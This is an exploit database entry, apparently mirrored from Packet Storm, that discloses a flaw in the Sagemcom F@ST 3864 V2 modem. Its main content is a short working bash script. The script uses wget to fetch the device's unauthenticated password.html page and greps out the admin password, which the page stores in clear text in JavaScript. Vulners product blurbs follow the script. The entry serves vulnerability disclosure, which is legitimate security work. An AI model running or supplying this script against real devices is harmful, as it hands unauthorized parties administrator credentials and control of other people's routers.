Lucene search
K

Sagemcom F@ST 3864 V2 Admin Password Disclosure

🗓️ 17 Aug 2015 00:00:00Reported by Cade BullType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Sagemcom F@ST 3864 V2 Admin Password Disclosur

Code
`#!/bin/bash  
#########################################  
# Exploit Title: Sagemcom 3864 V2 get admin password  
# Date 2015-08-15  
# Author: Cade Bull  
# Software Link: null  
# Tested on: Sagemcom F@ST 3864 V2  
# Version: 7.253.2_F3864V2_Optus  
#########################################  
  
# The sagemcom modem does not authenticate users when requesting pages, only whilst posting forms  
# the password.html page loads the admin password in clear text and stores it in Javascript, which is viewable without any credentials  
  
if [ "$1" != "" ]  
then  
IP_ADDRESS="$1"  
else  
echo "Usage : $0 IP_ADDRESS"  
exit 1  
fi  
  
USER_PASSWORD=`wget http://$IP_ADDRESS/password.html -t 1 -q -O - | grep "pwdAdmin" | tr " = " "\n" | grep "'" | tr -d "';" `  
echo "admin password = $USER_PASSWORD"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation